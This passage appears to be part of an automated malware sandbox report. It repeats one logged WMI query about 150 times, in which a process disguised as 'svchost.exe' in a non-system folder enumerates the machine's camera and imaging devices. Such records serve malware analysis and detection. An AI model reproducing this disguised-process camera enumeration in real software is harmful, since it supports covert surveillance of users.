Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
